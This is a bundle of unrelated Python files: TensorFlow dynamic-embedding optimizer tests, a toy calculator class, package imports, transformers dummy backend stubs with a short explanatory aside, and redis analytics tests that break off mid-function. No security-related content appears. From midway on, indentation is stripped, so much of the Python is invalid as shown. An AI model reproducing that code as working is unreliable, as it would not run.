      raw_init_ids = [0, 1, 2, 3, 4]
      raw_init_vals = np.random.rand(5, dim)
      raw_ids = [0, 1, 1, 2, 3, 4, 4]

      # base graph
      def base_fn():
        embeddings = resource_variable_ops.ResourceVariable(raw_init_vals,
                                                            dtype=d_dtype)

        def loss_fn(emb):
          ids = constant_op.constant(raw_ids, dtype=k_dtype)
          unique_ids, idx = array_ops.unique(ids)
          unique_embeddings = embedding_ops.embedding_lookup([emb], unique_ids)
          pred = array_ops.gather(unique_embeddings, idx)
          return pred * pred

        base_opt_op = base_opt.minimize(lambda: loss_fn(embeddings),
                                        [embeddings])
        self.evaluate(variables.global_variables_initializer())
        for _ in range(run_step):
          self.evaluate(base_opt_op)
        return embeddings

      base_opt_val = self.evaluate(base_fn())

      def test_fn():
        embeddings = de.get_variable(
            "t2020-v2-" + name + str(id),
            key_dtype=k_dtype,
            value_dtype=d_dtype,
            devices=_get_devices() * num_shards,
            initializer=1.0,
            dim=dim,
        )
        self.device_check(embeddings)
        trainables = []
        init_ids = constant_op.constant(raw_init_ids, dtype=k_dtype)
        init_vals = constant_op.constant(raw_init_vals, dtype=d_dtype)
        self.evaluate(embeddings.upsert(init_ids, init_vals))

        def var_fn():
          return trainables

        def loss_fn(x, trainables):
          ids = constant_op.constant(raw_ids, dtype=k_dtype)
          pred, trainable = de.embedding_lookup_unique([x],
                                                       ids,
                                                       return_trainable=True)
          trainables.clear()
          trainables.append(trainable)
          return pred * pred

        test_opt_op = test_opt.minimize(lambda: loss_fn(embeddings, trainables),
                                        var_fn)
        self.evaluate(variables.global_variables_initializer())
        for _ in range(run_step):
          self.evaluate(test_opt_op)
        return embeddings.lookup(init_ids)

      with ops.device(_get_devices()[0]):
        test_opt_val = self.evaluate(test_fn())
      self.assertAllCloseAccordingToType(
          base_opt_val,
          test_opt_val,
          msg="Cond:{},{},{},{},{},{}".format(num_shards, k_dtype, d_dtype,
                                              initial_mode, dim, run_step),
      )
class EmbeddingLookupSparseTrainableV1Test(test.TestCase,
                                           CommonTrainableTestV1Base):

  def common_minimize_trainable(self, base_opt, test_opt, name):
    de.enable_train_mode()
    base_opt = de.DynamicEmbeddingOptimizer(base_opt)
    test_opt = de.DynamicEmbeddingOptimizer(test_opt)
    id = 0
    config = config_pb2.ConfigProto()
    config.allow_soft_placement = False
    for (num_shards, k_dtype, d_dtype, initial_mode, dim,
         run_step) in itertools.product(
             [1, 2],
             [dtypes.int64],
             [dtypes.float32],
             ["constant"],
             [1, 10],
             [10],
         ):
      id += 1
      raw_init_ids = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
      raw_init_vals = [
          [x] * dim
          for x in [0.0, 0.1, 0.3, 0.8, 0.16, 0.25, 0.36, 0.49, 0.64, 0.81]
      ]
      raw_ids = constant_op.constant([1, 3, 3, 9], dtype=k_dtype)
      sp_ids = sparse_tensor.SparseTensor(
          indices=[
              [0, 0],
              [0, 1],
              [1, 0],
              [2, 1],
          ],
          values=raw_ids,
          dense_shape=[3, 2],
      )
      x = constant_op.constant([[_x * dim] for _x in [[0.4], [0.5], [0.6]]],
                               dtype=d_dtype)
      x = array_ops.reshape(x, shape=(3 * dim, 1))
      # base branch
      with self.session(use_gpu=test_util.is_gpu_available(),
                        config=default_config) as sess:
        base_var = variables.Variable(
            np.array(raw_init_vals).reshape([len(raw_init_ids), dim]),
            dtype=d_dtype,
            shape=[len(raw_init_ids), dim],
        )
        base_embedding = embedding_ops.embedding_lookup_sparse(base_var,
                                                               sp_ids,
                                                               None,
                                                               combiner="sum")
        base_embedding = array_ops.reshape(base_embedding, shape=[1, 3 * dim])
        pred0 = math_ops.matmul(base_embedding, x)
        loss0 = pred0 * pred0
        base_opt_op = base_opt.minimize(loss0, var_list=[base_var])
        # run base
        self.evaluate(variables.global_variables_initializer())
        for _ in range(run_step):
          sess.run(base_opt_op)
        base_var_val = self.evaluate(base_var)

      # test branch
      with self.session(config=default_config,
                        use_gpu=test_util.is_gpu_available()) as sess:
        # test var prepare
        embeddings = de.get_variable(
            "t1030-" + name + str(id),
            key_dtype=k_dtype,
            value_dtype=d_dtype,
            devices=_get_devices() * num_shards,
            initializer=1.0,
            dim=dim,
        )
        self.device_check(embeddings)
        init_ids = constant_op.constant(raw_init_ids, dtype=k_dtype)
        init_vals = constant_op.constant(raw_init_vals, dtype=d_dtype)
        init_op = embeddings.upsert(init_ids, init_vals)
        self.evaluate(init_op)
        test_var, trainable = de.embedding_lookup_sparse(
            embeddings,
            sp_ids,
            sp_weights=None,
            combiner="sum",
            return_trainable=True,
        )
        pred1 = math_ops.matmul(array_ops.reshape(test_var, shape=[1, 3 * dim]),
                                x)
        loss1 = pred1 * pred1
        test_opt_op = test_opt.minimize(loss1, var_list=[trainable])
        self.evaluate(variables.global_variables_initializer())
        self.assertAllCloseAccordingToType(
            np.array(raw_init_vals).reshape([len(raw_init_ids), dim]),
            self.evaluate(base_var),
        )
        # Run `run_step` step of sgd
        for _ in range(run_step):
          sess.run(test_opt_op)
        if test_util.is_gpu_available():
          self.assertTrue(
              _check_device(embeddings.tables[0].resource_handle, "GPU"))
        table_var_val = self.evaluate(
            array_ops.reshape(embeddings.lookup(init_ids), shape=[10, dim]))
      # Validate updated params
      self.assertAllCloseAccordingToType(
          base_var_val,
          table_var_val,
          msg="Cond:{},{},{},{},{}".format(num_shards, k_dtype, d_dtype, dim,
                                           run_step),
      )
class EmbeddingLookupSparseTrainableV2Test(test.TestCase,
                                           CommonTrainableTestV2Base):

  def common_minimize_trainable_v2(self, base_opt, test_opt, name):
    de.enable_train_mode()
    tf.config.set_soft_device_placement(True)
    base_opt = de.DynamicEmbeddingOptimizer(base_opt)
    test_opt = de.DynamicEmbeddingOptimizer(test_opt)
    id = 0
    for (num_shards, k_dtype, d_dtype, initial_mode, dim,
         run_step) in itertools.product(
             [1, 2],
             [dtypes.int64],
             [dtypes.float32],
             ["constant"],
             [1, 10],
             [10],
         ):
      id += 1
      raw_init_ids = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
      raw_init_vals = [
          [x] * dim
          for x in [0.0, 0.1, 0.3, 0.8, 0.16, 0.25, 0.36, 0.49, 0.64, 0.81]
      ]
      with ops.device(_get_devices()[0]):
        raw_ids = constant_op.constant([1, 3, 3, 9], dtype=k_dtype)
        sp_ids = sparse_tensor.SparseTensor(
            indices=[
                [0, 0],
                [0, 1],
                [1, 0],
                [2, 1],
            ],
            values=raw_ids,
            dense_shape=[3, 2],
        )
        x = constant_op.constant([[_x * dim] for _x in [[0.4], [0.5], [0.6]]],
                                 dtype=d_dtype)
        x = array_ops.reshape(x, shape=(dim, -1))

      # base graph
      def base_fn():
        embeddings = variables.Variable(
            np.array(raw_init_vals).reshape([len(raw_init_ids), dim]),
            dtype=d_dtype,
            shape=[len(raw_init_ids), dim],
        )

        def loss_fn(emb):
          embedding = embedding_ops.embedding_lookup_sparse(emb,
                                                            sp_ids,
                                                            None,
                                                            combiner="sum")
          pred = math_ops.matmul(embedding, x)
          return pred * pred

        base_opt_op = base_opt.minimize(lambda: loss_fn(embeddings),
                                        [embeddings])
        self.evaluate(variables.global_variables_initializer())
        for _ in range(run_step):
          self.evaluate(base_opt_op)
        return embeddings

      base_opt_val = self.evaluate(base_fn())

      def test_fn():
        embeddings = de.get_variable(
            "t1030-v2-" + name + str(id),
            key_dtype=k_dtype,
            value_dtype=d_dtype,
            devices=_get_devices() * num_shards,
            initializer=1.0,
            dim=dim,
        )
        self.device_check(embeddings)
        init_ids = constant_op.constant(raw_init_ids, dtype=k_dtype)
        init_vals = constant_op.constant(raw_init_vals, dtype=d_dtype)
        self.evaluate(embeddings.upsert(init_ids, init_vals))
        trainables = []

        def var_fn():
          return trainables

        def loss_fn(emb, trainables):
          test_var, trainable = de.embedding_lookup_sparse(
              emb,
              sp_ids,
              sp_weights=None,
              combiner="sum",
              return_trainable=True,
          )
          pred = math_ops.matmul(test_var, x)
          trainables.clear()
          trainables.append(trainable)
          return pred * pred

        test_opt_op = test_opt.minimize(lambda: loss_fn(embeddings, trainables),
                                        var_fn)
        self.evaluate(variables.global_variables_initializer())
        for _ in range(run_step):
          self.evaluate(test_opt_op)
        return embeddings.lookup(init_ids)

      test_opt_val = self.evaluate(test_fn())
      self.assertAllCloseAccordingToType(
          base_opt_val,
          test_opt_val,
          msg="Cond:{},{},{},{},{},{}".format(num_shards, k_dtype, d_dtype,
                                              initial_mode, dim, run_step),
      )
class SafeEmbeddingLookupSparseTrainableV1Test(test.TestCase,
CommonTrainableTestV1Base):
@test_util.deprecated_graph_mode_only
def common_minimize_trainable(self, base_opt, test_opt, name):
de.enable_train_mode()
base_opt = de.DynamicEmbeddingOptimizer(base_opt)
test_opt = de.DynamicEmbeddingOptimizer(test_opt)
id = 0
config = config_pb2.ConfigProto(
allow_soft_placement=True,
gpu_options=config_pb2.GPUOptions(allow_growth=True),
)
for (
num_shards,
k_dtype,
d_dtype,
initial_mode,
dim,
run_step,
) in itertools.product(
[1, 2],
[dtypes.int64],
[
dtypes.float32,
],
[
"constant",
],
[1, 10],
[10],
):
with self.session(config=config, use_gpu=test_util.is_gpu_available()):
id += 1
raw_init_ids = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
raw_init_vals = [
[
x,
] * dim
for x in [0.0, 0.1, 0.3, 0.8, 0.16, 0.25, 0.36, 0.49, 0.64, 0.81]
]
raw_ids = constant_op.constant([1, 3, 3, 9], dtype=k_dtype)
sp_ids = sparse_tensor.SparseTensor(
indices=[
[0, 0],
[0, 1],
[1, 0],
[2, 1],
],
values=raw_ids,
dense_shape=[3, 2],
)
x = constant_op.constant([[_x * dim] for _x in [[0.4], [0.5], [0.6]]],
dtype=d_dtype)
x = array_ops.reshape(x, shape=(3 * dim, 1))
# base var prepare
base_var = variables.Variable(
np.array(raw_init_vals).reshape([len(raw_init_ids), dim]),
dtype=d_dtype,
shape=[len(raw_init_ids), dim],
)
base_embedding = embedding_ops.safe_embedding_lookup_sparse(
base_var, sp_ids, None, combiner="sum")
base_embedding = array_ops.reshape(base_embedding, shape=[1, 3 * dim])
pred0 = math_ops.matmul(base_embedding, x)
loss0 = pred0 * pred0
base_opt_op = base_opt.minimize(loss0, var_list=[base_var])
# test var prepare
embeddings = de.get_variable(
"s6030-" + name + str(id),
key_dtype=k_dtype,
value_dtype=d_dtype,
devices=_get_devices() * num_shards,
initializer=1.0,
dim=dim,
)
self.device_check(embeddings)
init_ids = constant_op.constant(raw_init_ids, dtype=k_dtype)
init_vals = constant_op.constant(raw_init_vals, dtype=d_dtype)
init_op = embeddings.upsert(init_ids, init_vals)
self.evaluate(init_op)
# test branch
test_var, trainable = de.safe_embedding_lookup_sparse(
embeddings,
sp_ids,
sparse_weights=None,
combiner="sum",
return_trainable=True,
)
pred1 = math_ops.matmul(array_ops.reshape(test_var, shape=[1, 3 * dim]),
x)
loss1 = pred1 * pred1
test_opt_op = test_opt.minimize(loss1, var_list=[trainable])
self.evaluate(variables.global_variables_initializer())
self.assertAllCloseAccordingToType(
np.array(raw_init_vals).reshape([len(raw_init_ids), dim]),
self.evaluate(base_var),
)
# run base
for _ in range(run_step):
self.evaluate(base_opt_op)
# Run `run_step` steps of SGD
for _ in range(run_step):
self.evaluate(test_opt_op)
table_var = array_ops.reshape(embeddings.lookup(init_ids),
shape=[10, dim])
# Validate updated params
self.assertAllCloseAccordingToType(
self.evaluate(base_var),
self.evaluate(table_var),
msg="Cond:{},{},{},{},{}".format(num_shards, k_dtype, d_dtype, dim,
run_step),
)
class SafeEmbeddingLookupSparseTrainableV2Test(test.TestCase,
CommonTrainableTestV2Base):
def common_minimize_trainable_v2(self, base_opt, test_opt, name):
de.enable_train_mode()
tf.config.set_soft_device_placement(True)
base_opt = de.DynamicEmbeddingOptimizer(base_opt)
test_opt = de.DynamicEmbeddingOptimizer(test_opt)
id = 0
for (
num_shards,
k_dtype,
d_dtype,
initial_mode,
dim,
run_step,
) in itertools.product(
[1, 2],
[
dtypes.int64,
],
[
dtypes.float32,
],
[
"constant",
],
[1, 10],
[10],
):
id += 1
raw_init_ids = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
raw_init_vals = [[
x,
] * dim for x in [0.0, 0.1, 0.3, 0.8, 0.16, 0.25, 0.36, 0.49, 0.64, 0.81]]
raw_ids = constant_op.constant([1, 3, 3, 9], dtype=k_dtype)
sp_ids = sparse_tensor.SparseTensor(
indices=[
[0, 0],
[0, 1],
[1, 0],
[2, 1],
],
values=raw_ids,
dense_shape=[3, 2],
)
x = constant_op.constant([[_x * dim] for _x in [[0.4], [0.5], [0.6]]],
dtype=d_dtype)
x = array_ops.reshape(x, shape=(dim, -1))
# base graph
def base_fn():
embeddings = variables.Variable(
np.array(raw_init_vals).reshape([len(raw_init_ids), dim]),
dtype=d_dtype,
shape=[len(raw_init_ids), dim],
)
def loss_fn(emb):
embedding = embedding_ops.safe_embedding_lookup_sparse(emb,
sp_ids,
None,
combiner="sum")
pred0 = math_ops.matmul(embedding, x)
return pred0 * pred0
base_opt_op = base_opt.minimize(lambda: loss_fn(embeddings),
[embeddings])
self.evaluate(variables.global_variables_initializer())
for _ in range(run_step):
self.evaluate(base_opt_op)
return embeddings
base_opt_val = self.evaluate(base_fn())
def test_fn():
embeddings = de.get_variable(
"s6030-v2-" + name + str(id),
key_dtype=k_dtype,
value_dtype=d_dtype,
devices=_get_devices() * num_shards,
initializer=1.0,
dim=dim,
)
self.device_check(embeddings)
init_ids = constant_op.constant(raw_init_ids, dtype=k_dtype)
init_vals = constant_op.constant(raw_init_vals, dtype=d_dtype)
self.evaluate(embeddings.upsert(init_ids, init_vals))
trainables = []
def var_fn():
return trainables
def loss_fn(emb, trainables):
test_var, trainable = de.safe_embedding_lookup_sparse(
emb,
sp_ids,
sparse_weights=None,
combiner="sum",
return_trainable=True,
)
pred = math_ops.matmul(test_var, x)
trainables.clear()
trainables.append(trainable)
return pred * pred
test_opt_op = test_opt.minimize(lambda: loss_fn(embeddings, trainables),
var_fn)
self.evaluate(variables.global_variables_initializer())
for _ in range(run_step):
self.evaluate(test_opt_op)
return embeddings.lookup(init_ids)
test_opt_val = self.evaluate(test_fn())
self.assertAllCloseAccordingToType(
base_opt_val,
test_opt_val,
msg="Cond:{},{},{},{},{},{}".format(num_shards, k_dtype, d_dtype,
initial_mode, dim, run_step),
)
@test_util.deprecated_graph_mode_only
class TrainDynamicEmbeddingInMonitoredTrainingSessionTest(test.TestCase):
"""Tests Training in MonitoredTrainingSession."""
def device_check(self, de):
if test_util.is_gpu_available():
self.assertTrue("GPU" in de.tables[0].resource_handle.device.upper())
def test_saving_restoring_checkpoint(self):
logdir = _test_dir(self.get_temp_dir(), "test_saving_restoring_checkpoint")
with ops.Graph().as_default():
gstep = training_util.create_global_step()
do_step = state_ops.assign_add(gstep, 1)
v0 = variables.Variable(10.0, name="v0")
v1 = variables.Variable(20.0, name="v1")
target_values = [[0.0], [1.0], [2.0]]
keys = array_ops.placeholder(dtypes.int64)
values = constant_op.constant(target_values, dtypes.float32)
table = de.Variable(
key_dtype=dtypes.int64,
value_dtype=dtypes.float32,
initializer=-1.0,
name="m100",
dim=1,
)
upsert_op = table.upsert(keys, values)
lookup_op = table.lookup(keys)
size_op = table.size()
with monitored_session.MonitoredTrainingSession(
config=default_config, is_chief=True, checkpoint_dir=logdir) as sess:
self.assertEqual(0, sess.run(gstep))
self.assertEqual(1, sess.run(do_step))
self.assertEqual(2, sess.run(do_step))
# Check that the parameter nodes have been initialized.
self.assertEqual(10.0, sess.run(v0))
self.assertEqual(20.0, sess.run(v1))
self.assertAllEqual(0, sess.run(size_op))
sess.run(upsert_op, feed_dict={keys: [0, 1, 2]})
self.assertAllEqual(3, sess.run(size_op))
self.device_check(table)
# A restart will find the checkpoint and recover automatically.
with monitored_session.MonitoredTrainingSession(
config=default_config, is_chief=True, checkpoint_dir=logdir) as sess:
self.assertEqual(2, sess.run(gstep))
self.assertAllEqual(3, sess.run(table.size()))
self.assertAllEqual(target_values,
sess.run(lookup_op, feed_dict={keys: [0, 1, 2]}))
self.device_check(table)
def common_minimize_trainable(self, base_opt, test_opt, name):
de.enable_train_mode()
base_opt = de.DynamicEmbeddingOptimizer(base_opt)
test_opt = de.DynamicEmbeddingOptimizer(test_opt)
id = 0
for (
num_shards,
k_dtype,
d_dtype,
initial_mode,
dim,
run_step,
) in itertools.product(
[3],
[dtypes.int64],
[
dtypes.float32,
],
[
"constant",
],
[1, 10],
[10],
):
with ops.Graph().as_default():
id += 1
raw_init_ids = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
raw_init_vals = [
[
x,
] * dim
for x in [0.0, 0.1, 0.3, 0.8, 0.16, 0.25, 0.36, 0.49, 0.64, 0.81]
]
raw_ids = constant_op.constant([1, 3, 3, 9], dtype=k_dtype)
sp_ids = sparse_tensor.SparseTensor(
indices=[
[0, 0],
[0, 1],
[1, 0],
[2, 1],
],
values=raw_ids,
dense_shape=[3, 2],
)
x = constant_op.constant([[_x * dim] for _x in [[0.4], [0.5], [0.6]]],
dtype=d_dtype)
x = array_ops.reshape(x, shape=(3 * dim, 1))
# base var prepare
base_var = variables.Variable(
np.array(raw_init_vals).reshape([len(raw_init_ids), dim]),
dtype=d_dtype,
shape=[len(raw_init_ids), dim],
)
# test var prepare
embeddings = de.get_variable(
"t1030-" + name + str(id),
key_dtype=k_dtype,
value_dtype=d_dtype,
devices=_get_devices() * num_shards,
initializer=1.0,
dim=dim,
)
init_ids = constant_op.constant(raw_init_ids, dtype=k_dtype)
init_vals = constant_op.constant(raw_init_vals, dtype=d_dtype)
init_op = embeddings.upsert(init_ids, init_vals)
# base branch
base_embedding = embedding_ops.embedding_lookup_sparse(base_var,
sp_ids,
None,
combiner="sum")
base_embedding = array_ops.reshape(base_embedding, shape=[1, 3 * dim])
pred0 = math_ops.matmul(base_embedding, x)
loss0 = pred0 * pred0
base_opt_op = base_opt.minimize(loss0, var_list=[base_var])
# test branch
test_var, trainable = de.embedding_lookup_sparse(
embeddings,
sp_ids,
sp_weights=None,
combiner="sum",
return_trainable=True,
)
pred1 = math_ops.matmul(array_ops.reshape(test_var, shape=[1, 3 * dim]),
x)
loss1 = pred1 * pred1
gstep = training_util.create_global_step()
test_opt_op = test_opt.minimize(loss1,
var_list=[trainable],
global_step=gstep)
table_var = array_ops.reshape(embeddings.lookup(init_ids),
shape=[10, dim])
with monitored_session.MonitoredTrainingSession(
is_chief=True, config=default_config) as sess:
sess.run(init_op)
self.assertAllCloseAccordingToType(
np.array(raw_init_vals).reshape([len(raw_init_ids), dim]),
sess.run(base_var),
)
# run base
for _ in range(run_step):
sess.run(base_opt_op)
sess.run(test_opt_op)
# Validate global_step
self.assertEqual(run_step, sess.run(gstep))
# Validate updated params
self.assertAllCloseAccordingToType(
sess.run(base_var),
sess.run(table_var),
msg="Cond:{},{},{},{},{}".format(num_shards, k_dtype, d_dtype,
dim, run_step),
)
self.device_check(embeddings)
def test_adam_minimize_trainable(self):
base_opt = adam.AdamOptimizer(0.1)
test_opt = adam.AdamOptimizer(0.1)
self.common_minimize_trainable(base_opt, test_opt, name="adam")
def test_adagrad_minimize_trainable(self):
base_opt = adagrad.AdagradOptimizer(0.1)
test_opt = adagrad.AdagradOptimizer(0.1)
self.common_minimize_trainable(base_opt, test_opt, name="adagrad")
@test_util.deprecated_graph_mode_only
class ModelModeTest(test.TestCase):
"""Tests ModelMode."""
def test_check_ops_number(self):
self.assertTrue(de.get_model_mode() == "train")
de.enable_inference_mode()
self.assertTrue(de.get_model_mode() == "inference")
de.enable_train_mode()
self.assertTrue(de.get_model_mode() == "train")
for fn, assign_num, read_num in [(de.enable_train_mode, 1, 2),
(de.enable_inference_mode, 0, 1)]:
fn()
embeddings = de.get_variable('ModelModeTest' + str(assign_num),
key_dtype=dtypes.int64,
value_dtype=dtypes.float32,
devices=_get_devices(),
initializer=1.,
dim=8)
ids = constant_op.constant([0, 1, 2, 3, 4], dtype=dtypes.int64)
test_var, trainable = de.embedding_lookup([embeddings],
ids,
return_trainable=True)
_ = math_ops.add(test_var, 1)
op_list = ops.get_default_graph().get_operations()
op_list_assign = [
op.name for op in op_list if "AssignBeforeReadVariable" in op.name
]
op_list_read = [op.name for op in op_list if "ReadVariableOp" in op.name]
self.assertTrue(len(op_list_assign) == assign_num)
self.assertTrue(len(op_list_read) == read_num)
de.enable_train_mode()
ops.reset_default_graph()
def test_inference_numeric_correctness(self):
train_pred = None
infer_pred = None
dim = 8
initializer = init_ops.random_normal_initializer(0.0, 0.001)
raw_init_vals = np.random.rand(100, dim)
for fn in [de.enable_train_mode, de.enable_inference_mode]:
with ops.Graph().as_default():
fn()
init_ids = constant_op.constant(list(range(100)), dtype=dtypes.int64)
init_vals = constant_op.constant(raw_init_vals, dtype=dtypes.float32)
with variable_scope.variable_scope("modelmode",
reuse=variable_scope.AUTO_REUSE):
embeddings = de.get_variable('ModelModeTest-numeric',
key_dtype=dtypes.int64,
value_dtype=dtypes.float32,
devices=_get_devices() * 2,
initializer=initializer,
dim=dim)
w = variables.Variable(1.0, name="w")
_ = training_util.create_global_step()
init_op = embeddings.upsert(init_ids, init_vals)
ids = constant_op.constant([0, 1, 2, 3, 4], dtype=dtypes.int64)
test_var, trainable = de.embedding_lookup([embeddings],
ids,
return_trainable=True)
pred = math_ops.add(test_var, 1) * w
loss = pred * pred
opt = de.DynamicEmbeddingOptimizer(adagrad.AdagradOptimizer(0.1))
opt.minimize(loss)
with monitored_session.MonitoredTrainingSession(
is_chief=True, config=default_config) as sess:
if de.get_model_mode() == de.ModelMode.TRAIN:
sess.run(init_op)
train_pred = sess.run(pred)
elif de.get_model_mode() == de.ModelMode.INFERENCE:
sess.run(init_op)
infer_pred = sess.run(pred)
de.enable_train_mode()
ops.reset_default_graph()
self.assertAllEqual(train_pred, infer_pred)
if __name__ == "__main__":
test.main()
# File: Python/app.python/aula7/aula7b.py (repo: jacksontenorio8/python, license: MIT)
class Calculadora:
def __init__(self):
pass  # __init__ cannot have an empty body, so pass is used as a placeholder
def soma(self, valorA, valorB):
return valorA + valorB
def subtracao(self, valorA, valorB):
return valorA - valorB
def multiplicacao(self, valorA, valorB):
return valorA * valorB
def divisao(self, valorA, valorB):
return valorA / valorB
calculadora = Calculadora()
print(calculadora.soma(10, 2))
print(calculadora.subtracao(5, 3))
print(calculadora.multiplicacao(10, 5))
print(calculadora.divisao(100, 2))
# File: stable_baselines_custom/trpo_mpi/__init__.py (repo: iamlab-cmu/stable-baselines, license: MIT)
from stable_baselines_custom.trpo_mpi.trpo_mpi import TRPO
# File: src/transformers/utils/dummy_timm_and_vision_objects.py (repo: bhavika/transformers, license: Apache-2.0)
# This file is autogenerated by the command `make fix-copies`, do not edit.
# flake8: noqa
from ..file_utils import DummyObject, requires_backends
DETR_PRETRAINED_MODEL_ARCHIVE_LIST = None
class DetrForObjectDetection(metaclass=DummyObject):
_backends = ["timm", "vision"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["timm", "vision"])
class DetrForSegmentation(metaclass=DummyObject):
_backends = ["timm", "vision"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["timm", "vision"])
class DetrModel(metaclass=DummyObject):
_backends = ["timm", "vision"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["timm", "vision"])
class DetrPreTrainedModel(metaclass=DummyObject):
_backends = ["timm", "vision"]
def __init__(self, *args, **kwargs):
requires_backends(self, ["timm", "vision"])
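The dummy-object pattern above defers the missing-backend error until a class is actually used: each stub declares its required backends (here `timm` and `vision`) and fails on instantiation. A minimal standalone sketch of the idea (a hypothetical re-implementation, not the actual `transformers` internals):

```python
class _DummyMeta(type):
    # Instantiating a dummy class raises instead of returning an object,
    # so the missing-backend error surfaces only on first use.
    def __call__(cls, *args, **kwargs):
        raise ImportError(
            "{} requires the backends: {}".format(cls.__name__, ", ".join(cls._backends))
        )

class DetrModelStub(metaclass=_DummyMeta):
    _backends = ["timm", "vision"]

try:
    DetrModelStub()
except ImportError as err:
    print(err)  # DetrModelStub requires the backends: timm, vision
```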
# File: kivent/modules/core/kivent_core/systems/__init__.py (repo: WeilerWebServices/Kivy, license: MIT)
from kivent_core.systems import gamesystem
from kivent_core.systems import staticmemgamesystem
from kivent_core.systems import scale_systems
from kivent_core.systems import gameview
from kivent_core.systems import rotate_systems
from kivent_core.systems import color_systems
from kivent_core.systems import position_systems
from kivent_core.systems import gamemap
from kivent_core.systems import renderers
from kivent_core.systems import lifespan
from kivent_core.systems import animation_sys
# File: tests/analytics/backends/redis_test.py (repo: educreations/py-analytics, license: Apache-2.0)
from nose.tools import ok_, eq_, raises, set_trace
from analytics import create_analytic_backend
import datetime
import itertools
class TestRedisAnalyticsBackend(object):
def setUp(self):
self._backend = create_analytic_backend({
"backend": "analytics.backends.redis.Redis",
"settings": {
"hosts": [{"db": 3}, {"db": 4}, {"db": 5}]
},
})
self._redis_backend = self._backend.get_backend()
#clear the redis database so we are in a consistent state
self._redis_backend.flushdb()
def tearDown(self):
self._redis_backend.flushdb()
def test_track_metric(self):
user_id = 1234
metric = "badge:25"
datetime_obj = datetime.datetime(year=2012, month=1, day=1)
ok_(self._backend.track_metric(user_id, metric, datetime_obj))
keys = self._redis_backend.keys()
#flatten the list of lists in case we have a cluster of redis servers
keys = list(itertools.chain.from_iterable(keys))
keys.sort()
eq_(len(keys), 3)
daily = self._redis_backend.hgetall(keys[2])
weekly = self._redis_backend.hgetall(keys[1])
aggregated = self._redis_backend.get(self._backend._prefix + ":" + "analy:%s:count:%s" % (user_id, metric, ))
#each metric should be at 1
[eq_(int(value), 1) for value in daily.values()]
[eq_(int(value), 1) for value in weekly.values()]
eq_(int(aggregated), 1)
#each hash should only have one key
eq_(len(daily.keys()), 1)
eq_(len(weekly.keys()), 2)
#try incrementing by the non default value
ok_(self._backend.track_metric(user_id, metric, datetime_obj, inc_amt=3))
keys = self._redis_backend.keys()
#flatten the list of lists in case we have a cluster of redis servers
keys = list(itertools.chain.from_iterable(keys))
keys.sort()
eq_(len(keys), 3)
daily = self._redis_backend.hgetall(keys[2])
weekly = self._redis_backend.hgetall(keys[1])
aggregated = self._redis_backend.get(self._backend._prefix + ":" + "analy:%s:count:%s" % (user_id, metric, ))
#each metric should be at 4
[eq_(int(value), 4) for value in daily.values()]
[eq_(int(value), 4) for value in weekly.values()]
eq_(int(aggregated), 4)
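The flatten step repeated throughout these tests can be shown in isolation: with a sharded setup, `keys()` returns one list of keys per redis server, and `itertools.chain.from_iterable` merges them into a single list before sorting (the key names below are illustrative):

```python
import itertools

# one list of keys per redis shard (illustrative key names)
per_shard_keys = [["analy:1:count:b"], ["analy:1:count:a", "analy:1:count:c"]]

# flatten the list of lists into one flat, sorted list
keys = list(itertools.chain.from_iterable(per_shard_keys))
keys.sort()
print(keys)  # ['analy:1:count:a', 'analy:1:count:b', 'analy:1:count:c']
```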
def test_track_count(self):
user_id = 1234
metric = "badge:25"
ok_(self._backend.track_count(user_id, metric))
keys = self._redis_backend.keys()
#flatten the list of lists in case we have a cluster of redis servers
keys = list(itertools.chain.from_iterable(keys))
eq_(len(keys), 1)
aggregated = self._redis_backend.get(self._backend._prefix + ":" + "analy:%s:count:%s" % (user_id, metric, ))
#count should be at 1
eq_(int(aggregated), 1)
#try incrementing by the non default value
ok_(self._backend.track_count(user_id, metric, inc_amt=3))
keys = self._redis_backend.keys()
#flatten the list of lists in case we have a cluster of redis servers
keys = list(itertools.chain.from_iterable(keys))
eq_(len(keys), 1)
aggregated = self._redis_backend.get(self._backend._prefix + ":" + "analy:%s:count:%s" % (user_id, metric, ))
#count should be at 4
eq_(int(aggregated), 4)
def test_get_count(self):
user_id = 1234
metric = "badge:25"
ok_(self._backend.track_count(user_id, metric))
keys = self._redis_backend.keys()
#flatten the list of lists in case we have a cluster of redis servers
keys = list(itertools.chain.from_iterable(keys))
eq_(len(keys), 1)
count = self._backend.get_count(user_id, metric)
#count should be at 1
eq_(count, 1)
#try incrementing by the non default value
ok_(self._backend.track_count(user_id, metric, inc_amt=3))
keys = self._redis_backend.keys()
#flatten the list of lists in case we have a cluster of redis servers
keys = list(itertools.chain.from_iterable(keys))
eq_(len(keys), 1)
count = self._backend.get_count(user_id, metric)
#count should be at 4
eq_(count, 4)
def test_get_count_invalid_key(self):
user_id = 1234
metric = "badge:25"
keys = self._redis_backend.keys()
#flatten the list of lists in case we have a cluster of redis servers
keys = list(itertools.chain.from_iterable(keys))
eq_(len(keys), 0)
count = self._backend.get_count(user_id, metric)
#count should be at 0
eq_(count, 0)
def test_get_counts(self):
user_id = 1234
metric = "badge:25"
metric2 = "badge:26"
does_not_exist = "key:does:not:exist"
ok_(self._backend.track_count(user_id, metric))
keys = self._redis_backend.keys()
#flatten the list of lists in case we have a cluster of redis servers
keys = list(itertools.chain.from_iterable(keys))
eq_(len(keys), 1)
#try incrementing by the non default value
ok_(self._backend.track_count(user_id, metric2, inc_amt=3))
keys = self._redis_backend.keys()
#flatten the list of lists in case we have a cluster of redis servers
keys = list(itertools.chain.from_iterable(keys))
eq_(len(keys), 2)
counts = self._backend.get_counts([(user_id, metric,), (user_id, metric2,), (user_id, does_not_exist,)])
#check the counts for each of the metrics
eq_(len(counts), 3)
eq_(counts[0], 1)
eq_(counts[1], 3)
eq_(counts[2], 0)
def test_get_counts_with_time_period(self):
start_date = datetime.date(year=2012, month=4, day=6)
end_date = datetime.date(year=2012, month=4, day=11)
user_id = "user1234"
metric = "badges:21"
metric2 = "badge:22"
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=5), inc_amt=2))
ok_(self._backend.track_metric(user_id, metric, datetime.datetime(year=2012, month=4, day=7), inc_amt=2))
